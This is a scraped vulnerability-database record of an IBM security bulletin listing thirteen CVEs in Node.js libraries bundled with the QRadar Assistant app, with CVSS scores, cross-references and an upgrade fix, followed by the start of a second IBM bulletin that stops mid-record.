DATABASE RESOURCES PRICING ABOUT US

{"id": "A5F102AA90B5BFDB2EE4442DF51659EE282A3C06887BA2EE4F4B5E779799F22B", "vendorId": null, "type": "ibm", "bulletinFamily": "software", "title": "Security Bulletin: IBM QRadar Assistant app for IBM QRadar SIEM includes components with multiple known vulnerabilities", "description": "## Summary\n\nThe product includes vulnerable components (e.g., framework libraries) that may be identified and exploited with automated tools. IBM has released a new version which addresses the vulnerabilities.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-42581](<https://vulners.com/cve/CVE-2021-42581>) \n** DESCRIPTION: **Ramda could allow a remote attacker to execute arbitrary code on the system, caused by a prototype pollution in the mapObjIndexed function. By supplying a specially-crafted object using the __proto__ argument, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/226072](<https://exchange.xforce.ibmcloud.com/vulnerabilities/226072>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-0536](<https://vulners.com/cve/CVE-2022-0536>) \n** DESCRIPTION: **Node.js follow-redirects module could allow a remote authenticated attacker to obtain sensitive information, caused by a leakage of the Authorization header from the same hostname during HTTPS to HTTP redirection. By utilize man-in-the-middle attack techniques, an attacker could exploit this vulnerability to obtain Authorization header information, and use this information to launch further attacks against the affected system. \nCVSS Base score: 2.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/219551](<https://exchange.xforce.ibmcloud.com/vulnerabilities/219551>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2022-0155](<https://vulners.com/cve/CVE-2022-0155>) \n** DESCRIPTION: **follow-redirects could allow a remote attacker to obtain sensitive information, caused by an unauthorized actor. By sending a specially-crafted request, a remote authenticated attacker could exploit this vulnerability to obtain private personal information and use this information to launch further attacks against the affected system. \nCVSS Base score: 8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216974](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216974>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-2596](<https://vulners.com/cve/CVE-2022-2596>) \n** DESCRIPTION: **Node.js node-fetch module is vulnerable to a denial of service, caused by a regular expression denial of service (ReDoS) flaw in the isOriginPotentiallyTrustworthy() function in the referrer.js script. By sending specially-crafted regex input, a remote attacker could exploit this vulnerability to cause a denial of service. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/232616](<https://exchange.xforce.ibmcloud.com/vulnerabilities/232616>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2020-15168](<https://vulners.com/cve/CVE-2020-15168>) \n** DESCRIPTION: **Node.js node-fetch module is vulnerable to a denial of service, caused by the failure to honor the size option after following a redirect. By using a specially-crafted file, a remote attacker could exploit this vulnerability to consume excessive resource on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/188155](<https://exchange.xforce.ibmcloud.com/vulnerabilities/188155>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2022-0235](<https://vulners.com/cve/CVE-2022-0235>) \n** DESCRIPTION: **Node.js node-fetch could allow a remote authenticated attacker to obtain sensitive information, caused by a flaw when fetching a remote url with Cookie. By sending a specially-crafted request, an attacker could exploit this vulnerability to obtain sensitive information. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217758](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217758>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) \n \n** CVEID: **[CVE-2020-7753](<https://vulners.com/cve/CVE-2020-7753>) \n** DESCRIPTION: **trim is vulnerable to a denial of service. By sending a specially crafted value, a remote attacker could exploit this vulnerability to cause a regular expression denial of service. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/190630](<https://exchange.xforce.ibmcloud.com/vulnerabilities/190630>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2020-28500](<https://vulners.com/cve/CVE-2020-28500>) \n** DESCRIPTION: **Node.js lodash module is vulnerable to a denial of service, caused by a regular expression denial of service (ReDoS) in the toNumber, trim and trimEnd functions. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196972](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196972>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-23337](<https://vulners.com/cve/CVE-2021-23337>) \n** DESCRIPTION: **Node.js lodash module could allow a remote authenticated attacker to execute arbitrary commands on the system, caused by a command injection flaw in the template. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base score: 7.2 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196797](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196797>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2019-10744](<https://vulners.com/cve/CVE-2019-10744>) \n** DESCRIPTION: **Node.js lodash module is vulnerable to a denial of service, caused by a prototype pollution flaw. By sending a specially-crafted request using a constructor payload, a remote attacker could exploit this vulnerability to inject properties onto Object.prototype to cause a denial of service condition. \nCVSS Base score: 9.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/167415](<https://exchange.xforce.ibmcloud.com/vulnerabilities/167415>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H) \n \n** CVEID: **[CVE-2020-8203](<https://vulners.com/cve/CVE-2020-8203>) \n** DESCRIPTION: **Node.js lodash module is vulnerable to a denial of service, caused by a prototype pollution attack. A remote attacker could exploit this vulnerability using the merge, mergeWith, and defaultsDeep functions to inject properties onto Object.prototype to crash the server and possibly execute arbitrary code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/183560](<https://exchange.xforce.ibmcloud.com/vulnerabilities/183560>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-43307](<https://vulners.com/cve/CVE-2021-43307>) \n** DESCRIPTION: **Node.js semver-regex module is vulnerable to a denial of service, caused by a regular expression denial of service (ReDoS) flaw in the test() method. By sending specially-crafted regex input, a remote attacker could exploit this vulnerability to cause a denial of service. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/228061](<https://exchange.xforce.ibmcloud.com/vulnerabilities/228061>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-3795](<https://vulners.com/cve/CVE-2021-3795>) \n** DESCRIPTION: **semver-regex is vulnerable to a denial of service, caused by the inefficient regular expression complexity. A remote attacker could exploit this vulnerability to cause a denial of service. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/209463](<https://exchange.xforce.ibmcloud.com/vulnerabilities/209463>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM QRadar Assistant| 1.0.0 - 3.5.2 \n \n\n\n## Remediation/Fixes\n\nIBM encourages customers to update their systems promptly. \n\n[Update to 3.6.0](<https://exchange.xforce.ibmcloud.com/hub/extension/b7959316396ed9ecd7f970167214ff65> \"Update to 3.6.0\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "published": "2022-11-09T18:53:30", "modified": "2022-11-09T18:53:30", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 6.5}, "severity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.2}, "href": "https://www.ibm.com/support/pages/node/6838293", "reporter": "IBM", "references": [], "cvelist": ["CVE-2019-10744", "CVE-2020-15168", "CVE-2020-28500", "CVE-2020-7753", "CVE-2020-8203", "CVE-2021-23337", "CVE-2021-3795", "CVE-2021-42581", "CVE-2021-43307", "CVE-2022-0155", "CVE-2022-0235", "CVE-2022-0536", "CVE-2022-2596"], "immutableFields": [], "lastseen": "2023-02-28T21:38:37", "viewCount": 8, "enchantments": {"dependencies": {"references": [{"type": "almalinux", "idList": ["ALSA-2023:0050"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0416"]}, {"type": "cnvd", "idList": ["CNVD-2022-76985"]}, {"type": "cve", "idList": ["CVE-2019-10744", "CVE-2020-15168", "CVE-2020-28500", "CVE-2020-7753", "CVE-2020-8203", "CVE-2021-23337", "CVE-2021-3795", "CVE-2021-42581", "CVE-2021-43307", "CVE-2022-0155", "CVE-2022-0235", "CVE-2022-0536", "CVE-2022-2596"]}, {"type": "debian", "idList": ["DEBIAN:DLA-3222-1:083ED"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2019-10744", "DEBIANCVE:CVE-2020-15168", "DEBIANCVE:CVE-2020-28500", "DEBIANCVE:CVE-2020-8203", "DEBIANCVE:CVE-2021-23337", "DEBIANCVE:CVE-2021-42581", "DEBIANCVE:CVE-2022-0155", "DEBIANCVE:CVE-2022-0235", "DEBIANCVE:CVE-2022-0536", "DEBIANCVE:CVE-2022-2596"]}, {"type": "f5", "idList": ["F5:K12492858", "F5:K47105354"]}, {"type": "github", "idList": ["GHSA-29MW-WPGM-HMR9", "GHSA-35JH-R3H4-6JHM", "GHSA-44C6-4V22-4MHX", "GHSA-4X5V-GMQ8-25CH", "GHSA-74FJ-2J2H-C42Q", "GHSA-8P5Q-J9M2-G8WR", "GHSA-JF85-CPCP-J695", "GHSA-P6MC-M468-83GW", "GHSA-PW2R-VQ6V-HR8C", "GHSA-R683-J2X4-V87G", "GHSA-VP56-6G26-6827", "GHSA-W5P7-H5W8-2HFQ", "GHSA-W7RC-RWVF-8Q5R"]}, {"type": "githubexploit", "idList": ["0F9925B5-8753-571B-9551-BFB1CC2BE8F2", "E56192E7-FC31-58F7-A982-BEA41F95D172"]}, {"type": "hackerone", "idList": ["H1:712065"]}, {"type": "huntr", "idList": ["006624E3-35AC-448F-AAB9-7B5183F30E28", "1E8F07FC-C384-4FF9-8498-0690DE2E8C31", "3189C0B7-68FB-4372-A407-C6A19A22A3BF", "51DFE927-1BF1-4B36-91CA-2197337E663A", "7B9EF50A-3D1D-490A-8FA4-F1EC5E3D3BBF", "7CF2BF90-52DA-4D59-8028-A73B132DE0DB", "A7E6A136-0A4B-46C4-AD20-802F1DD60BF7", "D26AB655-38D6-48B3-BE15-F9AD6B6AE6F7", "FC524E4B-EBB6-427D-AB67-A64181020406"]}, {"type": "ibm", "idList": ["0602C49DA7AFD86456463E6424B1565996BFB3A4334A3E509D18B4E1454C702A", "063491361B2190A4BDB47CE0565DAC2669F1F803EA0AE2C2F5C154AF5B3184B0", "0AD1ABD3A4EE94669ABFEF468671D6A66B8F413908447E8D0315800041BEDF41", "0C8E06A8D7C8A317EC9DCB3FC6E82453314622553B78ED06DDB7A31DD15F465E", "0D3AC1653A7CFC61981BECC263BCD833E5441240DF62D2E529CB279D31CBD069", "0FF78AF1C487DE3B1A92548681C12BB71F6CB2B0B453E94F828CDEF3248FE0FD", "182ABCECEC608BADE96BCE85E39885F9C426570CF16077D455A1277D9CC3649A", "1E239D8C4813C8FA705CBB86F01F323B29B73D1086FDF65021C9CB4B0146A272", "26DAA09B7B725284403A5958F9F931A154E7F981FE5B15C52EF287FBC719570C", "2845AD6FAC4EA95B559A4E380E9C11A324976019B59ABF05F3BD5C0D71A9860E", "2A7AFCB510C3CFDA672046970D2866A6A7D1C2E5D1E14283EB51BB73906CBCA3", "2AB31A2452F1029931921EB5550E825A48628AEC211877653233AD2750800450", "2CE77B4160EBFD2BED97809CE15EBFFD32F5E48045C65040BF0F1EDBB3388D3C", "330AEC48CC3C4D6D0571BCFF4F46F80B8B8300E288E40954485D292947FD965D", "3377752E14891E5A442DF0DA38E0021D9F4E99031F28898352E2D80466B51A2F", "354F2A6471BEE4CED51706BB642672B83ADCF320EE2401C7C84197080BA6099F", "3B5AA55C19B7A3B2E56D553A91DED976FF216D3E05DBF0D4AE695FCDF38AA2D2", "3CD52A300CCFA76570B837A6AD424B08DA0B07EB9FDDB409947AA1A645F8C1BB", "46FAA835435B75C9ACF0355A61E51FB1D066AB3F9C5269FB30BFFF04C2C7D336", "478D539053FCDD73C5A8373E16979758B81C985D8E7BF025D07D04F9628EF459", "4D4AB5316A6B8B864EF20AC92A165303484F0EF5EAF13A61CD628D9334E9AB46", "4DE2C566A4DB221CD8E8337EDA25A0265351DB234C38F6A15A5E14F50CCBB4AD", "4EFA75F734C92FB0E8831F39A2E89AB1853E96D3FE2E59C7F86F1BDFBE8163EA", "4F727EC09488BA3419509F300A9AD0025F1245D7716544CE8751D7671913661B", "51036564FFC2834C5C0AEA3B9E457B929AAC861C25125D8BC0F6986E3A684E88", "53728EF49CBD2D57C5A7DFD396D80D633E1B2698B544552FBD73673F671BDD9A", "5C271AD23C78209D68E7A87FEE871717C7B2FBA4E3C92BC59004D9DAAA41DBDE", "5CF5E501F33F27E00550D56AF2E8B4DD49ABBF9F37122E58BF4BBEBB4CE88ECC", "5FB88F97069B24B10212175375A1EE4C325F7D931FD5B3390FDDFC06BD6F90B8", "6128A13C04F8ECEA7D864C9BB4042D04376F9E25186BB47D9F6B544820BE25EE", "62A0E59EAB7A2FA0DBD2BB5063BE3EDF565D21DBC6282F80891D4898DEC5B043", "643E846D7944EB8AF4DC6AA049F3D7CEA565A47905FF0E8DC5627CB212EA131D", "64ADFD088203597B59C398AB3DEF28DC4F72D37A4C48C7FA81C6531EDA6A9877", "6549F7FB91216E6B5325DB660AF73FDF2D181F5FC1D3D96D412B600D6C349A96", "6758266A7390DD86DCC39627FCB97E5999C1246244C7FD8A7CE56F3FFF7DB72F", "68CBF727C8EF5456458B2504A21BC4A8C5D69369E847DE24B58B0481A4C43133", "6BA70D78F086D07D5D04D35657C565B766597C9DE86C3B8D586D271713B4D89A", "6EE64696FDA9665AA0F54B4FB93057230ED3464327A74367561AE8FE0E2653CA", "70A9E006601471831C111535E5AEE0524C324100C2852ADCCA9ECFE67BDDCA0D", "743B0C7662E1826545C0F7458FEB6B2C956751FD07D49467FFD3F57A902C54EF", "77A5CD46FD3C6940EFC34DE8C8AA831927106A12E0E3EAC862A5D46723F4092E", "7AE4383D619D418CABE7152FB7E807377BEB422FC2E2543F14B7926B017944EA", "7DC20E33AEE12D8C047DEA72271A62A680A525F01237467155E55137DACD1D44", "7E48E83AB3B599D048D884D2F2A9C830676F7F8EE7EFC2B799BFE4618D5E9A2F", "7FD9F7FFE1C0EF8F68DFE234A094535CE5CD56211AA4CA79732A71BF6B3C0262", "8275C3B123771E721297381D0F66E5CCB99C5D5EA14F12413C6DF109D950665B", "83BEAE016A4ABD4FF346942DB25C3402A9F41C06DCE8690EF6135DC71C501718", "8AE73E7788D425E7758D6639D44230CC4CB98CD649CB92F28391CB1E55BB4271", "8C84F9F6803F7B599727F54AFEA8E6241BA3FD1510B15AE2524E912A02E9BC46", "91ACCACCF51183B22B704C13615BFD4650511CBD23CDA3DFFC59F6EA4243161F", "94A01D2CF2192721BEC6AADD5AA1F6F77E4160E60A91D15CDDF7AF41661CFFDA", "97D5F772EC68BDCD260FBB9DFB7A322AAAC657E9360305DF11F9C6A6A40D1B85", "9D9A01E02514803E9E0E5DD88830752E1595E1F1CC50F35B26CA6DC44AE2E184", "9E122C3147369696EEB22BB3077D52C1A9B149F5FD98D9E64ECA4092528218A8", "A1EDB9F080D136915C41FC93DD601226B7CED464E5D5D90AA293CF2531D2E05F", "A67BBEE8D7ACC7113E69EA86A7657D4CC6D510A3407BCB843AB7301624C0D77A", "A6BB7DA66FC718A2182210DB01ECE231562B4B2F7BADC0F1E4C08E483DC7FCF2", "AF584771147487ACBB5230FB00DA473BDA6B02F820E8C00B06BB04A7FACEE913", "B13A430866DCA64C67F6C19A04FDDBD8E0F1F18817F983A4A482E59069E86B7E", "B5AA883A7ECBB98CC082171970FB0FD2158AEB520B2B654518056D674E2939C5", "BAAF8EAD73C367A58A25800EF35FD2E3A4671B1EB487F502B95D9555A1D90CCE", "C28EAFF1CC71A4F487A89A39207111406CEEB9D4565E34E02EC25999839C6D3E", "C596338966F1610A28DC01FBB21502CC71651B70DBC8B96D9603EBE432E4D5E6", "C7D4749D45522C5407F869E674374544E27C48913CA6460504CFD68DC1061FB6", "CE9673C31D0D5A62B7B7DB43DC860904F84A43924D00B12EF5877209E580BA6B", "CEE914F2A9C303F09F1BBE51743533607509D4AD5902E5567A43B8EBE45C4DB5", "CF49D3C68973180FF18BD6C75A4B377A56810C21E28DDDFFBFD24EC340BB8DA8", "D224038BE1C5B28D93803F4019B326C9B17606EF82CD73FB95293E7CA7C36468", "D6677B366CD35E1B4F6DF838B54EFE8571FBCE9D92919BBCBB56A5A34A788F1B", "D8582663E621E7FA23FD9F12EB4D3E34A5AF5BAA61771775D239C395FB2A8F65", "D8A776D3B0AC34F7E1A0CD9930DE0D129047F912F17BAA37C912C1C104FBA268", "DADA1FE16809A5FC90650AF1F43162F58CAA00EC2A73D51B4ACDCCCDC28F33A7", "DED899C681C4F01F658F5349E77058BDF8C51E88FADBC17AC63AAD856B4CADE5", "DFB4A89370117A0C76AEBA610891449C199F7498B60521F9612F1A48A7736A6B", "DFB4A9585ACCD058A33E7C0B787D6C7AD3CF5F7FAE137EEC5A2BC75C501CD55E", "E23F7B0954D8804CF73BA94A1EC50BB525067CF5C982BEE6402F9DE045B28EF2", "E74DCF3005E160FC964375A6D950A25614126F8ED7F149A05686EF42F9A468E0", "E775C68CA18D51E91E688F1880BD5AF1955B5F4DF7397FA28CC721E37DAFB99A", "E7916A39B8F8B202061B3356B641D9B0DF934409579E8BA6EC2F6E7C3BABEB69", "E90F2758EB55FDBC299EC4F9D774418DBCCC47DB3CE55D154EB978135CCA6896", "E9CE56A0D3AED40D70C6118F6F1140DE3C104D09576AFA0D3225D5F8AF840D26", "E9E1A81B83D89662A4701E3073B58E59FD1FC0DD93A3454D407830444DA1A6F5", "EBFB2438D75E8F72CF1C93F67530A33FEEB6EBB40BD3883F85616AFE9252BCE2", "EEB2361CC674CA5958E10BC3152430D3B5AE7AEE5701640829F56F8548E53B31", "F0DEAA11864C79AB944778587F6E4E173522B7E2598E5D03BA63AD035A2ABBA7", "F1815E83BF0EF6927077C76716B0A692E6C2404995F1A39B4C3B4D79335F5467", "F44B378FA4B9E4A8D4D61DB7AA1CF1B912D25AF8276D0BD1E6E86ED3C7B5BC7B", "F62691A32672AF34E201E6A62FAE9008EDCB052DF3846E1F1D2194C5F194833E", "F62DE39E6BBF78B361B2012BC02FAADBB8E936EF06E4AEF3BE7D67F25A370F61", "F75806AF51F262CD91F3E2017F6775AF7816B8E15289C5596B33856B18979E5B", "F98BEC356DD90D730B85A69226BDC5C7E4DC1C091DA534EFB69BE5603DE0F98B", "FD0E85A6790A7A5E9E4ED07F7E069BEFCDF351251124844206CB202EC5DE5168", "FD3B6DACCDF2917EDE59BC97EFBE6A2BE91294E55463A289E02F5106FB9C2596", "FE6D95CEEFE9596CD6D6134F8326AB13E3C97D550B3E62F57DECDBDBC51C329A", "FF5A8A25C6F29CF39641217FCD026C317D3243C49B57A257E96A9297D83DE158", "FFEEC184B6E70C6210AE293D53A3A1B1504EA119812486B8160ACE05A643D9DD"]}, {"type": "ics", "idList": ["ICSA-22-258-05"]}, {"type": "nessus", "idList": ["ALMA_LINUX_ALSA-2023-0050.NASL", "CENTOS8_RHSA-2023-0050.NASL", "DEBIAN_DLA-3222.NASL", "F5_BIGIP_SOL47105354.NASL", "ORACLELINUX_ELSA-2023-0050.NASL", "ORACLE_PRIMAVERA_GATEWAY_CPU_JUL_2021.NASL", "ORACLE_PRIMAVERA_GATEWAY_CPU_OCT_2021.NASL", "ORACLE_PRIMAVERA_UNIFIER_CPU_OCT_2021.NASL", "REDHAT-RHSA-2019-3024.NASL", "REDHAT-RHSA-2020-2362.NASL", "REDHAT-RHSA-2020-3369.NASL", "REDHAT-RHSA-2020-3807.NASL", "REDHAT-RHSA-2020-5179.NASL", "REDHAT-RHSA-2020-5611.NASL", "REDHAT-RHSA-2021-2179.NASL", "REDHAT-RHSA-2021-3459.NASL", "REDHAT-RHSA-2022-8502.NASL", "REDHAT-RHSA-2023-0050.NASL", "REDHAT-RHSA-2023-0612.NASL", "SUSE_SU-2022-1459-1.NASL", "SUSE_SU-2022-1461-1.NASL", "SUSE_SU-2022-1462-1.NASL", "SUSE_SU-2022-1466-1.NASL", "SUSE_SU-2022-1694-1.NASL", "SUSE_SU-2022-1717-1.NASL", "WEB_APPLICATION_SCANNING_112967", "WEB_APPLICATION_SCANNING_112968", "WEB_APPLICATION_SCANNING_112969", "WEB_APPLICATION_SCANNING_112970", "WEB_APPLICATION_SCANNING_112971", "WEB_APPLICATION_SCANNING_112972", "WEB_APPLICATION_SCANNING_113006", "WEB_APPLICATION_SCANNING_113007", "WEB_APPLICATION_SCANNING_113008", "WEB_APPLICATION_SCANNING_98979", "WEB_APPLICATION_SCANNING_98980", "WORDPRESS_5_8_1.NASL"]}, {"type": "nodejs", "idList": ["NODEJS:1065", "NODEJS:1523", "NODEJS:1556", "NODEJS:1673", "NODEJS:1700"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2021", "ORACLE:CPUAPR2022", "ORACLE:CPUJAN2021", "ORACLE:CPUJAN2022", "ORACLE:CPUJUL2021", "ORACLE:CPUJUL2022", "ORACLE:CPUOCT2020", "ORACLE:CPUOCT2021"]}, {"type": "oraclelinux", "idList": ["ELSA-2023-0050"]}, {"type": "osv", "idList": ["OSV:DLA-3222-1", "OSV:GHSA-29MW-WPGM-HMR9", "OSV:GHSA-35JH-R3H4-6JHM", "OSV:GHSA-44C6-4V22-4MHX", "OSV:GHSA-4X5V-GMQ8-25CH", "OSV:GHSA-74FJ-2J2H-C42Q", "OSV:GHSA-JF85-CPCP-J695", "OSV:GHSA-P6MC-M468-83GW", "OSV:GHSA-PW2R-VQ6V-HR8C", "OSV:GHSA-R683-J2X4-V87G", "OSV:GHSA-VP56-6G26-6827", "OSV:GHSA-W5P7-H5W8-2HFQ", "OSV:GHSA-W7RC-RWVF-8Q5R"]}, {"type": "redhat", "idList": ["RHSA-2019:3024", "RHSA-2020:2362", "RHSA-2020:3369", "RHSA-2020:3807", "RHSA-2020:4298", "RHSA-2020:5179", "RHSA-2020:5611", "RHSA-2021:1168", "RHSA-2021:2179", "RHSA-2021:2438", "RHSA-2021:2543", "RHSA-2021:3016", "RHSA-2021:3259", "RHSA-2021:3459", "RHSA-2021:3873", "RHSA-2021:3917", "RHSA-2021:5038", "RHSA-2021:5134", "RHSA-2022:0595", "RHSA-2022:0735", "RHSA-2022:0856", "RHSA-2022:1083", "RHSA-2022:1476", "RHSA-2022:1681", "RHSA-2022:1715", "RHSA-2022:1739", "RHSA-2022:4956", "RHSA-2022:5069", "RHSA-2022:5101", "RHSA-2022:5392", "RHSA-2022:5483", "RHSA-2022:6156", "RHSA-2022:6429", "RHSA-2022:6813", "RHSA-2022:6835", "RHSA-2022:7055", "RHSA-2022:8502", "RHSA-2022:8524", "RHSA-2023:0050", "RHSA-2023:0612"]}, {"type": "redhatcve", "idList": ["RH:CVE-2019-10744", "RH:CVE-2019-10747", "RH:CVE-2020-15168", "RH:CVE-2020-28500", "RH:CVE-2020-7753", "RH:CVE-2020-8203", "RH:CVE-2021-23337", "RH:CVE-2021-3795", "RH:CVE-2021-42581", "RH:CVE-2022-0155", "RH:CVE-2022-0235", "RH:CVE-2022-0536", "RH:CVE-2022-2596"]}, {"type": "rocky", "idList": ["RLSA-2023:0050"]}, {"type": "suse", "idList": ["SUSE-SU-2022:1461-1", "SUSE-SU-2022:1462-1", "SUSE-SU-2022:1694-1", "SUSE-SU-2022:1717-1"]}, {"type": "thn", "idList": ["THN:101765240E90491A3C0627908D36E708"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2019-10744", "UB:CVE-2020-15168", "UB:CVE-2020-28500", "UB:CVE-2020-8203", "UB:CVE-2021-23337", "UB:CVE-2022-0155", "UB:CVE-2022-0235", "UB:CVE-2022-0536", "UB:CVE-2022-2596"]}, {"type": "veracode", "idList": ["VERACODE:25079", "VERACODE:26730", "VERACODE:27683", "VERACODE:29405", "VERACODE:29408", "VERACODE:32126", "VERACODE:33599", "VERACODE:33726", "VERACODE:34127", "VERACODE:35471", "VERACODE:35860", "VERACODE:36570"]}]}, "affected_software": {"major_version": [{"name": "ibm qradar siem", "version": 3}]}, "score": {"value": 1.2, "vector": "NONE"}, "epss": [{"cve": "CVE-2019-10744", "epss": "0.010040000", "percentile": "0.813540000", "modified": "2023-03-20"}, {"cve": "CVE-2020-15168", "epss": "0.000830000", "percentile": "0.336100000", "modified": "2023-03-20"}, {"cve": "CVE-2020-28500", "epss": "0.001820000", "percentile": "0.537390000", "modified": "2023-03-20"}, {"cve": "CVE-2020-7753", "epss": "0.005430000", "percentile": "0.738550000", "modified": "2023-03-20"}, {"cve": "CVE-2020-8203", "epss": "0.009540000", "percentile": "0.808620000", "modified": "2023-03-20"}, {"cve": "CVE-2021-23337", "epss": "0.006060000", "percentile": "0.752940000", "modified": "2023-03-20"}, {"cve": "CVE-2021-3795", "epss": "0.000850000", "percentile": "0.343160000", "modified": "2023-03-20"}, {"cve": "CVE-2021-42581", "epss": "0.000480000", "percentile": "0.147920000", "modified": "2023-03-20"}, {"cve": "CVE-2021-43307", "epss": "0.000460000", "percentile": "0.138900000", "modified": "2023-03-20"}, {"cve": "CVE-2022-0155", "epss": "0.000920000", "percentile": "0.377610000", "modified": "2023-03-20"}, {"cve": "CVE-2022-0235", "epss": "0.001410000", "percentile": "0.481690000", "modified": "2023-03-20"}, {"cve": "CVE-2022-0536", "epss": "0.001200000", "percentile": "0.445160000", "modified": "2023-03-20"}, {"cve": "CVE-2022-2596", "epss": "0.000460000", "percentile": "0.138900000", "modified": "2023-03-20"}], "vulnersScore": 1.2}, "_state": {"dependencies": 1677620340, "score": 1677620399, "affected_software_major_version": 1677621718, "epss": 1679345642}, "_internal": {"score_hash": "915c48c05362e5a18bd0dfa8a39fa1dc"}, "affectedSoftware": [{"version": "3.6.0", "operator": "eq", "name": "ibm qradar siem"}]}

{"ibm": [{"lastseen": "2023-03-27T19:14:56", "description": "## Summary\n\nThere are vulnerabilities CVE-2020-28500, CVE-2021-23337, CVE-2020-8203 which affects IBM Engineering Workflow Management (EWM).\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-28500](<https://vulners.com/cve/CVE-2020-28500>) \n** DESCRIPTION: **Node.js lodash module is vulnerable to a denial of service, caused by a regular expression denial of service (ReDoS) in the toNumber, trim and trimEnd functions. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196972](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196972>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-23337](<https://vulners.com/cve/CVE-2021-23337>) \n** DESCRIPTION: **Node.js lodash module could allow a remote authenticated attacker to execute arbitrary commands on the system, caused by a command injection flaw in the template. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base score: 7.2 \nCVSS Temporal Score: See: [ 